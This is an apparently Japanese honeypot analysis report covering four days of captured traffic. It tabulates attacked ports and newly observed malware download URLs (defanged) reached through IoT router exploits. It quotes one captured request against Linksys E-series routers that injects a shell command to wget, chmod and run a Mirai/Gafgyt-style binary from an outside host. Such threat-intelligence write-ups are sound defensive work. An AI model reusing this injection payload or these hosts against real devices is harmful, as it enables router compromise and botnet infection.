【ハニーポット簡易分析】Honeytrap簡易分析(238-241日目:4/9-4/11)
238-241日目の簡易分析となります。
※80ポートは除く
<宛先ポート別検知数>
| 宛先ポート | 検知数 | サービス例 |
| 445 | 6443 | SMB |
| 8080 | 1083 | PROXY |
| 20022 | 240 | SSH |
| 2222 | 233 | SSH |
| 222 | 232 | SSH |
| 22222 | 231 | SSH |
| 2211 | 226 | SSH |
| 2022 | 218 | SSH |
| 3389 | 214 | RDP |
| 81 | 131 | GoAhead Web Server |
SSHに対する通信を多く検知しています。最近はSSHが増加傾向だと思われます。
<新規マルウェアダウンロード>
| ポート | マルウェアダウンロード先 | HTTPリクエストパス | VT | 備考 |
| 8080 | hxxp://34[.]80[.]131[.]135/bins/shiina[.]mpsl | POST /tmUnblock.cgi | ||
| 52869 | hxxp://134[.]209[.]249[.]142/sbot[.]mip | POST /picsdesc.xml | ||
| 52869 | hxxp://134[.]209[.]249[.]142/sbot[.]netgear[.]mips | POST /picsdesc.xml | VirusTotal | |
| 52869 | hxxp://185[.]161[.]70[.]165/mips | POST /picsdesc.xml | VirusTotal | |
| 52869 | hxxp://185[.]172[.]110[.]226/mips | POST /picsdesc.xml | ||
| 52869 | hxxp://185[.]172[.]110[.]227/Corona[.]mips | POST /picsdesc.xml | VirusTotal | |
| 52869 | hxxp://185[.]172[.]110[.]227/mips | POST /picsdesc.xml | VirusTotal | |
| 52869 | hxxp://91[.]209[.]70[.]174/Corona[.]mips | POST /picsdesc.xml | VirusTotal | Gafgyt |
今回はIoT系の脆弱性を多めに検知していました(検知条件にミスがあったので一部検知できていなかったことも原因ですが。。。)
◾️気になった通信
POST /tmUnblock.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.20.0
ttcp_ip=-h `cd /tmp; rm -rf Oasis.mpsl; wget hxxp://xxx[.]xxx.xxx.xxx/bins/shiina.mpsl; chmod 777 tmp.mpsl; ./tmp.mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
Linksys ルータの E シリーズの脆弱性を狙った攻撃です。
今回、まずは Oasis.mpsl を削除していることから、他のマルウェアをまずは駆除した上で実行しています。その後はこれまでと同様の動きと同じで wget でマルウェアをダウンロードし、パーミッションを変更および実行する流れとなります。
UAがpython-requests/2.20.0であることからツールか何かで実行していると推測されます。
以上となります。
